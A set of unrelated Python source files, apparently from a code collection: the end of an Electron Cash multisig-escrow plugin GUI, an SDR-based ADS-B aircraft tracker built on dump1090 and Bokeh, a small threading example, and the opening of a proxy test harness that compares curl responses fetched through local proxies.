self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("The address you entered was not a multisig address.")
return
xpub = dialog.xpub.text()
if xpub[:2] != "ff" or len(xpub) < 100:
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("The x_pubkey that you entered is invalid.")
return
#currentContract = self.getCurrentContract()
currentContract = dialog.currentContract
if self.cashRip.contracts[currentContract]["my_x_pubkey"] == xpub:
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("You entered your own x_pubkey, not your partner's.")
return
try:
self.textArea2.setText("Please wait . . .")
self.textArea2.repaint()
contract = self.cashRip.create_multisig_addr(currentContract, xpub, False)
except:
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("Something was wrong with the x_pubkey you pasted.")
return
if contract["address"] == addrOrig:
self.textArea2.setText("Success. You and your partner generated the same address. You can now send funds to {}".format(addrOrig))
self.cashRip.startSyncMultiWallet(currentContract)
else:
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("Something went wrong. You and your partner generated different addresses. Please double-check the x_pubkeys that you have sent to each other.")
os.remove(contract['addrWalletFile'])
del contract["addrWalletFile"]
del contract["address"]
del contract["partner_addr"]
del contract["partner_x_pubkey"]
del contract["partner_pubkey"]
del contract["gen_by_me"]
del contract["redeemScript"]
self.cashRip.updateContracts()
self.cashRip.multiWallets[currentContract] = None
self.parent.update()
def requestRelease(self):
self.clearTextArea()
currentContract = self.getCurrentContract()
if currentContract == None:
return
if "address" not in self.cashRip.contracts[currentContract]:
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("This contract does not have a multisig address yet.")
return
item = self.table.currentItem()
balance = float(item.text(3))+float(item.text(4))
if balance == 0:
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("This contract has no funds yet.")
return
text, ok = QInputDialog.getText(self, "Request Release","Address to release funds to:", QLineEdit.Normal, "")
if ok:
addr = text
try:
addrCheck = Address.from_string(addr)
except AddressError as e:
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("The release address you entered was invalid.")
return
try:
self.textArea2.setText("Please wait . . .")
self.textArea2.repaint()
tx = self.cashRip.maketx_from_multisig(currentContract, addr)
except ValueError as e:
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText(str(e))
return
# EC 3.3.1 needs output address to be Address object rather than String. Giving it String will cause AssertionError. TypeError is caused if you give Address object to EC 3.3.2 - this won't run for now.
except (AssertionError,TypeError) as e:
#print(type(e))
tx = self.cashRip.maketx_from_multisig(currentContract, addrCheck)
self.textArea2.setText("Send this transaction hex to your partner. He needs it to release your funds:\n{}".format(tx['hex']))
def release(self):
self.clearTextArea()
currentContract = self.getCurrentContract()
if currentContract == None:
return
if "address" not in self.cashRip.contracts[currentContract]:
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("This contract does not have a multisig address yet.")
return
item = self.table.currentItem()
balance = float(item.text(3))+float(item.text(4))
if balance == 0:
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("This contract has no funds yet.")
return
text, ok = QInputDialog.getText(self, "Release","Transaction hex:", QLineEdit.Normal, "")
if ok:
txhex = text
if len(txhex) < 150:
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("The transaction hex you entered was too short.")
return
try:
self.textArea2.setText("Please wait . . .")
self.textArea2.repaint()
sent = self.cashRip.sign_broadcast_tx_from_partner(txhex, currentContract)
if sent:
self.textArea2.setText("Transaction was broadcast to the network.")
else:
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("Transaction was not broadcast. Either you selected the wrong contract or the transaction hex did not contain a valid signature.")
except:
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("Something went wrong. Maybe the hex value was invalid.")
def delContract(self):
self.clearTextArea()
currentContract = self.getCurrentContract()
if currentContract == None:
return
curItem = self.table.currentItem()
balC = curItem.text(3)
balU = curItem.text(4)
if curItem.text(2)[:4] != 'Wait' and (balC != "0.0" or balU != "0.0"):
#buttonReply = QMessageBox.question(self, 'Confirmation', "Are you sure you want to delete Contract #{}? It contains funds and you will be unable to release them in the future.".format(currentContract), QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("Cannot delete Contract #{} as it contains funds.".format(currentContract))
return
buttonReply = QMessageBox.question(self, 'Confirmation', "Are you sure you want to delete Contract #{}?".format(currentContract), QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if buttonReply == QMessageBox.Yes:
self.cashRip.delContract(currentContract)
#self.table.update()
self.parent.update()
else:
return
class CheckAddressDialog(QDialog):
def __init__(self, parent):
super(CheckAddressDialog, self).__init__()
self.parent = parent
self.createFormGroupBox()
buttonBox = QDialogButtonBox(QDialogButtonBox.Ok | QDialogButtonBox.Cancel)
buttonBox.accepted.connect(self.accept)
buttonBox.rejected.connect(self.reject)
mainLayout = QVBoxLayout()
mainLayout.addWidget(self.formGroupBox)
mainLayout.addWidget(buttonBox)
self.setLayout(mainLayout)
self.setWindowTitle("Check Address")
self.resize(self.sizeHint())
def accept(self):
self.parent.checkAddressAcc(self)
self.close()
def createFormGroupBox(self):
self.formGroupBox = QGroupBox("Check that your partner generated the multisig address correctly.")
layout = QFormLayout()
self.address = QLineEdit()
self.xpub = QLineEdit()
layout.addRow(QLabel("Address:"), self.address)
layout.addRow(QLabel("Partner's x_pubkey:"), self.xpub)
self.formGroupBox.setLayout(layout)
class cashRipList(MyTreeWidget):
#filter_columns = [0, 2]
def __init__(self, parent):
self.columns = [ _("Index"), _("Label"),_("Address"), _("Confirmed"), _("Unconfirmed"), _("Your x_pubkey") ]
MyTreeWidget.__init__(self, parent, self.create_menu, self.columns, 5, [1])
self.cashRip = self.parent.parent.cashRip
self.setSelectionMode(QAbstractItemView.ExtendedSelection)
self.setSortingEnabled(True)
#self.setColumnWidth(1,5000)
def create_menu(self, position):
menu = QMenu()
selected = self.selectedItems()
names = [item.text(0) for item in selected]
keys = [item.text(1) for item in selected]
column = self.currentColumn()
column_title = self.headerItem().text(column)
column_data = '\n'.join([item.text(column) for item in selected])
menu.addAction(_("Copy {}").format(column_title), lambda: QApplication.clipboard().setText(column_data))
if column in self.editable_columns:
item = self.currentItem()
menu.addAction(_("Edit {}").format(column_title), lambda: self.editItem(item, column))
#run_hook('create_contact_menu', menu, selected)
menu.exec_(self.viewport().mapToGlobal(position))
def on_edited(self, item, column, prior):
label = item.text(1)
if len(label) > 40:
label = label[:50]
for c in self.cashRip.contracts:
if c["my_x_pubkey"] == item.text(5):
c["label"] = label
self.cashRip.updateContracts()
self.update()
return
def on_update(self):
#print("Updating tables")
#standard, multi = self.cashRip.getContractWalletBalances()
multi = self.cashRip.getMultiBalances()
item = self.currentItem()
current_id = int(item.text(0)) if item else None
self.clear()
items = []
for i,c in enumerate(self.cashRip.contracts):
if "address" in c:
addr = c['address']
values = [str(i), c["label"], addr, str(multi[addr][0]/COIN), str(multi[addr][1]/COIN), c["my_x_pubkey"]]
item = QTreeWidgetItem(values)
self.addTopLevelItem(item)
else:
item = QTreeWidgetItem([str(i), c["label"], "Wait for partner to send address.", None, None, c["my_x_pubkey"]])
self.addTopLevelItem(item)
if i == current_id:
self.setCurrentItem(item)
class SignalDummy(QObject):
update_signal = pyqtSignal()
class Plugin(BasePlugin):
def fullname(self):
return 'cash_rip'
def description(self):
return _("Configure CashRip Protocol")
def is_available(self):
return True
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.windows = []
self.tabs = []
self.cashRip = None
self.config = config
self.signal_dummy = SignalDummy()
self.signal_dummy.update_signal.connect(self.update)
#self.tableUpdater = threading.Thread(target=self.updateTableLoop)
#self.tableUpdater.daemon = True
self.keepUpdating = True
self.tableUpdater = TaskThread(self.signal_dummy)
self.tableUpdater.add(self.updateTableLoop)
self.tableUpdater.start()
#self.wallet_windows = {}
@hook
def init_qt(self, gui):
# We get this multiple times. Only handle it once, if unhandled.
if self.windows:
return
for window in gui.windows:
self.load_wallet(window.wallet, window)
def updateTableLoop(self):
while self.keepUpdating:
time.sleep(6)
self.signal_dummy.update_signal.emit()
@hook
def load_wallet(self, wallet, window):
"""
Hook called when a wallet is loaded and a window opened for it.
"""
if self.cashRip == None:
topDir = os.path.join(self.config.path, 'cash_rip_data')
self.cashRip = CashRip(topDir, window.network)
self.windows.append(window)
tab = cashripQT(window, self)
self.tabs.append(tab)
#self.tab.set_coinshuffle_addrs()
icon = QIcon(":icons/tab_coins.png")
description = _("Cash Rip")
name = "Cash Rip"
tab.tab_icon = icon
tab.tab_description = description
#self.tab.tab_pos = len(self.window.tabs)
tab.tab_name = name
window.tabs.addTab(tab, icon, description.replace("&", ""))
@hook
def on_close_window(self, window):
idx = self.windows.index(window)
#tab = self.tabs[idx]
del self.windows[idx]
#tab.tableUpdater.stop()
#tab.keepUpdating = False
del self.tabs[idx]
def on_close(self):
"""
BasePlugin callback called when the plugin is disabled among other things.
"""
for idx,w in enumerate(self.windows):
tab = self.tabs[idx]
tabIndex = w.tabs.indexOf(tab)
w.tabs.removeTab(tabIndex)
self.tableUpdater.stop()
self.keepUpdating = False
self.windows.clear()
self.tabs.clear()
#@pyqtSlot()
def update(self):
for tab in self.tabs:
tab.table.update()
def requires_settings(self):
return False
if __name__ == '__main__':
app = QApplication(sys.argv)
p = Plugin(None, None, None)
network = Network(None)
network.start()
topDir = os.path.join(os.getcwd(), 'cash_rip_data')
p.cashRip = CashRip(topDir, network)
ex = cashripQT(p)
p.tabs.append(ex)
sys.exit(app.exec_())
|
main.py
|
import numpy as np
from threading import Thread, Event, Lock
import socket as sock
from subprocess import Popen
import sys
import time
import cartopy.crs as ccrs
from cartopy.geodesic import Geodesic
import platform
from geocoder import ip
import pyModeS as pms
from bokeh.plotting import curdoc, figure
from bokeh.models import ColumnDataSource, WheelZoomTool, WMTSTileSource, HoverTool
from bokeh.models.glyphs import ImageURL, Circle, MultiLine
from gc import collect
from os import _exit
# Unit conversions
ft = 0.3048 # Meters, exactly
kt = 1852 / 3600 # Meters / second, exactly
ft_min = ft / 60 # Meters / second, exactly
# Aircraft types
cats = {41:'Light', 42:'Small', 43:'Large', 44:'High-Vortex Large', 45:'Heavy', 46:'High Performance', 47:'Rotorcraft',
31:'Glider', 32:'Lighter-than-Air', 33:'Skydiver', 34:'Ultralight', 35:'Reserved', 36:'UAV', 37:'Space Vehicle',
21:'Surface Emergency Vehicle', 22:'Surface Service Vehicle', 23:'Point Obstacle', 24:'Cluster Obstacle', 25:'Line Obstacle', 26:'Reserved', 27:'Reserved'}
# Available sprites
sprites = {41:'Light', 42:'Small', 43:'Large', 44:'High-VortexLarge', 45:'Heavy', 47:'Rotorcraft',
31:'Glider', 34:'Ultralight'}
# ColumnDataSources for sending aircraft data to the plot. If you want to change these, remember to also change the new data dictionaries in atc() to match
# rot is specifically for rotating the aircraft sprite. hdg is the useful heading
# hb is an attempt to fix a mysterious bug involving phantom hitbox circles being left behind
planeSprites = ColumnDataSource(dict(img = [], x = [], y = [], rot = [], hb = [], addr = [], call = [], cat = [], alt = [], hdg = [], spd = []))
planeShdws = ColumnDataSource(dict(img = [], x = [], y = [], rot = []))
planeTrails = ColumnDataSource(dict(x = [], y = [])) # Active aircraft trails
planePaths = ColumnDataSource(dict(x = [], y = [])) # Historic flight paths
geo = Geodesic() # Define an ellipsoid to solve geodesic problems on
v = False # Verbose logging - toggles whether aircraft update messages are printed to the log
def log(strn):
now = time.strftime('%H:%M:%S')
print(now, strn)
f_log.write(now + ' ' + strn + '\n')
class Plane:
def __init__(self, addr):
self.addr = addr # ICAO address
self.seen = None # Timestamp of last message
self.call = 'UNKNOWN' # Callsign
self.cat = 'UNKNOWN' # Category
self.sprite = 'Large' # Sprite to display
self.pos = [] # Current position in Lat, Lon coordinates
self.alt = [] # Array of altitudes (feet)
self.gspd = None # Ground speed (knots)
self.aspd = None # Air speed (knots), this one seems largely unused.
self.hdg = None # Heading
self.clm = None # Climb rate (ft / min)
self.vel_t = None # Timestamp of the previous velocity message
# Aircraft velocity, used for estimating position between messages
self.vel = None
self.azi = None # Azimuth - this is the direction of travel along the ground, and is defined as anti-clockwise from East
# Require 2 position messages to initially decode the position, so save the previous one here
self.old_msg = None # Store the previous position message
self.old_odd = None # Message parity: 0 = Even, 1 = Odd
self.old_t = None # Timestamp of the previous position message
# Checks whether an aircraft's calculated velocity is exceedingly different from its broadcast velocity, and falls back to the broadcast velocity if needed
def vel_check(plane):
if plane.azi and plane.gspd and (plane.vel/(plane.gspd * kt) + (plane.gspd * kt)/plane.vel > 3 or (180 - abs(abs(90 - plane.hdg - plane.azi) - 180)) > 15):
plane.azi = 90 - plane.hdg
plane.vel = plane.gspd * kt
def parser(strm, traffic):
while not cease.is_set():
# dump1090 performs error checking and necessary corrections, so no need for any of that here
msg = strm.readline().rstrip()[1:-1] # Read a single line from the TCP stream
df = pms.df(msg) # Get the downlink format of this message
if not (df == 17 or df == 18):
continue # Discard this message if it's not one we want
with traffic_l: # Acquire traffic lock
addr = pms.icao(msg) # Get the ICAO address
plane = traffic.get(addr) # Get the corresponding plane if it exists
if not plane:
if v: log('Aircraft ' + addr + ' discovered')
plane = Plane(addr) # If it doesn't, create a new plane
traffic[addr] = plane
plane.seen = time.time()
tc = pms.typecode(msg) # Get the message typecode
# Callsign
if tc >= 1 and tc <= 4:
plane.call = pms.adsb.callsign(msg).replace('_', ' ').strip()
ec = int(msg[9], 16) & 0b0111 # Get the emitter category
if tc != 1 and ec: # Typecode 1 is reserved, and an ec of 0 means the data is unavailable.
plane.cat = cats[tc * 10 + ec]
sprite = sprites.get(tc * 10 + ec)
if sprite: plane.sprite = sprite # Set the aircraft sprite if one is available
elif not ec:
plane.cat = 'Unavailable'
else:
plane.cat = 'Reserved'
if v: log('Updated aircraft ' + addr + ' callsign: ' + plane.call + ' and category: ' + plane.cat + ' (TC = {:d}, EC = {:d})'.format(tc, ec))
# Position
elif tc >= 9 and tc <= 18:
if plane.pos: # A position reference can be used to decode a single message once a fix is achieved
plane.pos.append(pms.adsb.position_with_ref(msg, plane.pos[-1][0], plane.pos[-1][1]))
plane.alt.append(pms.adsb.altitude(msg))
# Solve the inverse geodesic problem to calculate the aircraft's velocity
# This tends to be more reliable than the broadcast velocity for predicting the aircraft's current position
disp = np.array(geo.inverse(plane.pos[-2], plane.pos[-1]))
plane.vel = disp[0, 0] / (plane.seen - plane.old_t)
plane.azi = disp[0, 2]
# A very large displacement in a short space of time usually indicates a corrupt position, try again with fresh position messages
if plane.gspd and plane.vel > plane.gspd * kt * 8: # 8 times broadcast speed seems to be a reasonable threshold
log('Warning: Aircraft ' + addr + ' moved faster than expected -\nCalculated {:.1f} m/s, received {:.1f} m/s\n\
...Verifying position...'.format(plane.vel, plane.gspd * kt))
plane.pos = [] # Erase position history
plane.old_msg = None # Reset old message to ensure a fresh pair
plane.old_odd = None
plane.old_t = None
continue
else: # If we don't have a position fix yet
odd = (int(msg[13], 16) >> 2) & 1 # Get the message parity. One day I'll remember there's two hex characters to a byte...
# If we have an old message saved and one message is odd and the other is even...
if plane.old_msg and plane.old_odd ^ odd:
if odd: # If the new message is the odd one
plane.pos.append(pms.adsb.position(plane.old_msg, msg, plane.old_t, plane.seen))
else:
plane.pos.append(pms.adsb.position(msg, plane.old_msg, plane.seen, plane.old_t))
# Occasionally, an aircraft position will somehow be calculated as None. Catch this before it breaks anything
if plane.pos[-1] == None:
log('Warning: Aircraft ' + addr + ' position was found to be None')
plane.pos.pop(-1) # Remove the faulty position
plane.old_msg = msg
plane.old_odd = odd
plane.old_t = plane.seen
continue
plane.alt.append(pms.adsb.altitude(msg))
# Find where the plane was when it sent the old message to get the velocity azimuth
pos_old = pms.adsb.position_with_ref(plane.old_msg, plane.pos[-1][0], plane.pos[-1][1])
disp = np.array(geo.inverse(pos_old, plane.pos[-1]))
plane.vel = disp[0, 0] / (plane.seen - plane.old_t)
plane.azi = disp[0, 2]
else: # The messages are useless on their own or if they have the same parity, so save this message and wait for another one.
plane.old_msg = msg
plane.old_odd = odd
# Verify the calculated velocity, unless it's been too long since the last velocity message
# This should prevent aircraft from drifting around corners
if plane.vel_t and plane.seen - plane.vel_t < 5: vel_check(plane)
plane.old_t = plane.seen # Timestamp of most recent position
if v:
if plane.pos:
log('Updated aircraft ' + addr + ' position: {:.5f} N, {:.5f} E, {:d} ft'.format(plane.pos[-1][0], plane.pos[-1][1], plane.alt[-1]))
else:
log('Updated aircraft ' + addr + ' position: No fix yet, initial message saved')
# Velocity
elif tc == 19:
try:
spd, plane.hdg, plane.clm, spd_t = pms.adsb.velocity(msg)
except TypeError: # Very rarely, the velocity calculation will return None. Catch this before it breaks anything
log('Warning: Failed to update aircraft ' + addr + ' velocity due to a TypeError')
continue
if spd_t == 'GS': # Check whether we got a ground speed or air speed
plane.gspd = spd
if v: log('Updated aircraft ' + addr +
' velocity: Ground speed = {:d} kt, Heading = {:.1f} deg, Climb rate = {:d} ft/min'.format(plane.gspd, plane.hdg, plane.clm))
else:
plane.aspd = spd
if v: log('Updated aircraft ' + addr +
' velocity: Air speed = {:d} kt, Heading = {:.1f} deg, Climb rate = {:d} ft/min'.format(plane.aspd, plane.hdg, plane.clm))
# Update velocity if needed
vel_check(plane)
plane.vel_t = plane.seen # Timestamp of most recent velocity
else:
pass # Unrecognised typecode
# Keeps track of air traffic and updates the map
def atc():
new_plane_data = dict(img = [], x = [], y = [], rot = [], hb = [], addr = [], call = [], cat = [], alt = [], hdg = [], spd = [])
new_shdw_data = dict(img = [], x = [], y = [], rot = [])
new_trail_data = dict(x = [], y = [])
new_path_data = dict(x = [], y = [])
active = 0 # Number of active aircraft to be displayed
ded = [] # Aircraft that need to be deleted
pos = [] # Aircraft lat, lon positions
azi = [] # Aircraft azimuths
dst = [] # Aircraft distances travelled since last message
now = time.time()
with traffic_l:
for addr, plane in traffic.items():
age = now - plane.seen
if age > 60: # If the plane hasn't been heard from in over a minute
ded.append(addr) # Mark this plane for deletion
continue
ghost = 'Ghost' if age > 30 else '' # If the plane is starting to get old, make it a ghost
if plane.pos and plane.hdg: # Only show an aircraft if it has all the necessary data. Callsign messages are fairly rare and also non-critical
active += 1
new_plane_data['addr'].append(addr)
new_plane_data['img'].append(wdir + 'static/Sprites/' + plane.sprite + ghost + '.png')
pos.append(plane.pos[-1])
azi.append(plane.azi) # This seems to be defined as anti-clockwise from East for some reason
dst.append(plane.vel * (now - plane.old_t)) # Predicted distance travelled since last position message
new_plane_data['rot'].append(np.radians(315 - plane.hdg)) # Image sprite rotation
new_plane_data['call'].append(plane.call)
new_plane_data['cat'].append(plane.cat)
new_plane_data['alt'].append(plane.alt[-1])
new_plane_data['hdg'].append(plane.hdg)
new_plane_data['spd'].append(plane.gspd if plane.gspd else plane.aspd)
new_shdw_data['img'].append(wdir + 'static/Sprites/' + plane.sprite + ghost + 'Shadow.png')
new_shdw_data['rot'].append(np.radians(315 - plane.hdg))
if len(plane.pos) > 1: # Draw a trail if we have more than one point for this aircraft
pos_hst = np.array(plane.pos)
pos_hst_mct = ccrs.GOOGLE_MERCATOR.transform_points(ccrs.PlateCarree(), pos_hst[:,1], pos_hst[:,0])
new_trail_data['x'].append(pos_hst_mct[:,0])
new_trail_data['y'].append(pos_hst_mct[:,1])
for addr in ded:
# Save a limited amount of the aircraft's data before deletion
pos_hst = np.array(traffic.get(addr).pos)
if len(pos_hst) > 1:
pos_hst_mct = ccrs.GOOGLE_MERCATOR.transform_points(ccrs.PlateCarree(), pos_hst[:,1], pos_hst[:,0])
new_path_data['x'].append(pos_hst_mct[:,0])
new_path_data['y'].append(pos_hst_mct[:,1])
del traffic[addr] # Delete this aircraft
if v: log('Aircraft ' + addr + ' deleted')
pos_est = np.array(geo.direct(pos, azi, dst)) # Estimated positions based on old position and displacement vector
# Note for the confused: transform_points takes coordinates in the form (x, y), which in PlateCaree coordinates ends up as Lon, Lat (instead of the usual Lat, Lon)
pos_mct = ccrs.GOOGLE_MERCATOR.transform_points(ccrs.PlateCarree(), pos_est[:,1], pos_est[:,0])
# hb gives all hitbox circles a screen-size of 60. Any phantom circles won't have a size and therefore won't appear. Hopefully.
new_plane_data.update(x = pos_mct[:,0], y = pos_mct[:,1], hb = [60] * active)
new_shdw_data.update(x = pos_mct[:,0], y = pos_mct[:,1] - np.array(new_plane_data['alt'])/50) # Offset the shadow vertically based on altitude
planeSprites.stream(new_plane_data, active)
planeShdws.stream(new_shdw_data, active)
planeTrails.stream(new_trail_data, active)
planePaths.stream(new_path_data, 100) # Remember 100 aircraft. Remembering too many could cause performance issues
def stop(ctxt):
log('...Stopping program...')
cease.set() # Stop the parsing thread
# Wait for threads to finish
t_parse.join()
log('...Closing TCP connection...')
s.close() # Close the TCP connection
log('...Closing dump1090...')
dmp.terminate() # Exit dump1090
log('Goodbye')
f_log.close()
sys.exit(0) # sys.exit works perfectly fine here for some reason
# Stop the server when the bowser window is closed
curdoc().on_session_destroyed(stop) # This can sometimes take quite a while
# Changing --check-unused-sessions or --unused-session-lifetime on server startup might fix this
# When run as a bokeh server, a different namespace is used
wdir = '' if __name__ == '__main__' else 'sdr_adsb/'
f_log = open(wdir + 'log.txt', 'w')
log('...Initialising...')
log('...Starting Dump1090...')
if platform.system() == 'Windows':
dmp = Popen([wdir + 'static/dump1090-win.1.10.3010.14/dump1090', '--net', '--quiet'])
else:
dmp = Popen([wdir + 'static/dump1090-master/dump1090', '--net', '--quiet'])
# Connect to Dump1090's TCP stream
HOST = '127.0.0.1'
PORT = 30002
log('...Connecting to Dump1090 at ' + HOST + ' on port {:d}...'.format(PORT))
s = sock.socket(sock.AF_INET, sock.SOCK_STREAM)
# If Dump doesn't start up before execution makes it here, the system actively refuses the connection, and no amount of timeout will help.
# Retry connection every second for 10 seconds
try:
for i in range(0, 10):
try: s.connect((HOST, PORT))
except ConnectionRefusedError: # The expected error when the system refuses the connection
time.sleep(1)
# Need to redefine the socket on Unix after an attempted connection otherwise it gives an invalid argument error on the next connection attempt
if platform.system() != 'Windows':
s = sock.socket(sock.AF_INET, sock.SOCK_STREAM)
if i == 9:
raise
except: # In case we get any other kind of error
raise
else:
break # If we didn't get an error, connection succeeded!
except Exception as e:
log('Unable to connect: ' + repr(e))
dmp_stat = dmp.poll()
if dmp_stat:
log('Dump1090 encountered an error, check the dongle is plugged in properly')
elif dmp_stat == None:
log('Dump1090 seems to be working fine, but couldn\'t be connected to\n\
Try checking the permissions for ' + HOST + ':' + repr(PORT))
dmp.terminate() # dump1090 is still running if its status is None, kill it
else:
log('Dump1090 quit unexpectedly')
log('...Exiting...')
f_log.close()
collect()
_exit(1) # This is not a clean exit, but it's the only one that works (sys.exit raises an exception, but does not stop the server)
strm = s.makefile() # Convert it to a file-like object to make use of the newlines dump1090 spits out
log('Connected')
log('...Starting parse thread...')
# Create threads
cease = Event() # Informs the parsing thread when it's time to end
traffic = {} # Used to store aircraft data
traffic_l = Lock() # Thread safety
t_parse = Thread(target = parser, args = [strm, traffic])
t_parse.start()
log('...Creating map...')
u_lat, u_lon = ip('me').latlng # User's position. Can sometimes be quite inaccurate
log('User found at {:.5f} N, {:.5f} E'.format(u_lat, u_lon))
u_pos = ccrs.GOOGLE_MERCATOR.transform_point(u_lon, u_lat, ccrs.PlateCarree())
# Create an empty plot in Mercator coordinates. sizing_mode expands the plot to fill the whole screen
# Important note: cartopy has two types of Mercator projections: Mercator() and GOOGLE_MERCATOR which are slightly different
# bokeh's implementation of the Mercator projection is equivalent to cartopy's GOOGLE_MERCATOR projection (hence its use in atc())
p = figure(x_range=(u_pos[0] - 200000, u_pos[0] + 200000), y_range=(u_pos[1] - 200000, u_pos[1] + 200000), x_axis_type="mercator", y_axis_type="mercator",
toolbar_location = None, tools = 'pan,wheel_zoom', sizing_mode = 'stretch_both')
# Map selection:
#p.add_tile(WMTSTileSource(url = 'https://tiles.basemaps.cartocdn.com/dark_all/{z}/{x}/{y}@2x.png'))
p.add_tile(WMTSTileSource(url = 'https://maps.wikimedia.org/osm-intl/{Z}/{X}/{Y}@2x.png'))
#p.add_tile(WMTSTileSource(url = 'http://c.tile.stamen.com/watercolor/{Z}/{X}/{Y}.jpg'))
p.select_one(WheelZoomTool).zoom_on_axis = False # Disable single axis zooming
p.toolbar.active_scroll = p.select_one(WheelZoomTool) # Make the scroll wheel the active zoom tool
# Define the glyphs for the plot. Some of these arguments correspond to ColumnDataSource columns
# Due to an issue with bokeh, image sprites cannot be rotated about their centres, hence the requirement for all noses in the top-left
plane_sprite = ImageURL(url = 'img', x = 'x', y = 'y', w = None, h = None, angle = 'rot', anchor = 'top_left')
plane_shdw = ImageURL(url = 'img', x = 'x', y = 'y', w = None, h = None, angle = 'rot', anchor = 'top_left')
# Make-shift hitbox for tooltips since image glyphs don't support the hovertool
circ = Circle(x = 'x', y = 'y', size = 'hb', line_alpha = 0, fill_alpha = 0)
plane_trail = MultiLine(xs = 'x', ys = 'y', line_color = '#FFFF00', line_width = 2)
plane_trail_shdw = MultiLine(xs = 'x', ys = 'y', line_color = '#000000', line_width = 4)
plane_paths = MultiLine(xs = 'x', ys = 'y', line_color = '#0000FF', line_width = 3, line_alpha = 0.2, line_cap = 'round', line_join = 'round')
# The order of these is important, and determines which glyphs are rendered on top of others. The later a glyph is added, the higher its level
p.add_glyph(planePaths, plane_paths) # Historic flight paths
p.add_glyph(planeTrails, plane_trail_shdw) # Aircraft trail borders
p.add_glyph(planeTrails, plane_trail) # Arcraft trails
p.add_glyph(planeShdws, plane_shdw) # Aircaft shadows
ccl = p.add_glyph(planeSprites, circ) # Aircraft tooltip hitboxes
p.add_glyph(planeSprites, plane_sprite) # Aircraft sprites
# Tooltips (restricted to only appear for the make-shift hitboxes)
p.add_tools(HoverTool(renderers = [ccl],
tooltips = [('ICAO', '@addr'), ('Flight', '@call'), ('Category', '@cat'), ('Altitude', '@alt ft'), ('Heading', '@hdg°'), ('Speed', '@spd kt')]))
curdoc().add_root(p) # Add the plot to the window
curdoc().title = "SDR Aircraft Tracker" # Give the window a name
curdoc().add_periodic_callback(atc, 100) # Update map every 100 ms
log('Initialisation complete')
|
start_new_threads.py
|
from threading import Thread
def my_function():
print("printing from thread")
if __name__ == "__main__":
threads = [Thread(target=my_function) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
|
test.py
|
import multiprocessing
import os
import re
import shutil
import socket
import subprocess
import sys
import time
import traceback
import psutil
CURL = 'curl.exe -s -L -k -A "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36" -H "Accept-Language: en-US"'
CURL_PROXY = ' --proxy-ntlm '
BASEURL = ""
PROXY = ""
TESTS = []
try:
ConnectionRefusedError
except NameError:
ConnectionRefusedError = socket.error
def exec_output(cmd):
pipe = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT).stdout
if pipe != None:
output = pipe.read().decode("UTF-8", "ignore")
else:
print("Error running curl")
sys.exit()
return output
def curl(url, proxy="", ntlm=False, filename="", head=False):
output = ""
cmd = CURL
if filename:
cmd += " -o " + filename
if head:
cmd += ' -I'
if proxy:
cmd += " --proxy " + proxy
if ntlm:
cmd += ' --proxy-ntlm -U :'
cmd += ' "%s"' % url
if "--debug" in sys.argv:
print(cmd)
return exec_output(cmd)
def getPyversion(cmd):
return int(exec_output(cmd + " -V").split(" ")[1].replace(".", ""))
def write(data, file):
with open(file, "w") as f:
f.write(data)
def check(url, proxy, port):
start = time.time()
a = curl(url, proxy=proxy, ntlm=True)
end = time.time()
ta = end - start
b = curl(url, proxy="localhost:%d" % port)
tb = time.time() - end
la = len(a)
lb = len(b)
out = 100
if la < lb:
out = la / lb * 100
elif la > lb:
out = lb / la * 100
print(" %.2f%%\t%.2fx\t%s" % (out, tb / ta, url))
def waitprocs(procs):
ret = True
while len(procs):
for i in range(len(procs)):
if not procs[i].is_alive():
if procs[i].exitcode:
ret = False
procs.pop(i)
break
time.sleep(0.1)
return ret
def run(base, port):
if not checkPxStart("localhost", port):
return False
start = time.time()
pop = ""
while True:
pop = curl(base, proxy="localhost:%d" % port)
if pop == "":
time.sleep(0.5)
else:
break
procs = []
#urls = re.findall('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', pop)
urls = re.findall("http[s]?://[a-zA-Z_./0-9-]+", pop)
if len(urls) == 0:
print("No urls found")
return False
for url in set(urls):
p = multiprocessing.Process(target=check, args=(url, PROXY, port))
#p.daemon = True
p.start()
procs.append(p)
time.sleep(0.5)
ret = True
if not waitprocs(procs):
ret = False
end = time.time()
print((" Time: %.2fs" % (end-start)) + " sec")
return ret
def runPxTest(cmd, testproc, ips, port, proxy):
global PROXY
PROXY = proxy
pipe = subprocess.Popen("cmd /k start /wait /min " + cmd + " --port=" + str(port), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
ret = testproc(ips, port)
pxproc = psutil.Process(pipe.pid)
for child in pxproc.children(recursive=True):
try:
child.kill()
except psutil.NoSuchProcess:
pass
try:
pxproc.kill()
except:
pass
time.sleep(0.5)
return ret
def runTest(test, python, count):
port = 3129
cmd = "px "
if python:
port = getPyversion(python) * 10
cmd = python + " px.py "
cmd += "--debug --uniqlog " + test[0] + " --port=" + str(port)
testproc = test[1]
ips = test[2]
print("Test %d: \"" % count + test[0] + "\" on port " + str(port))
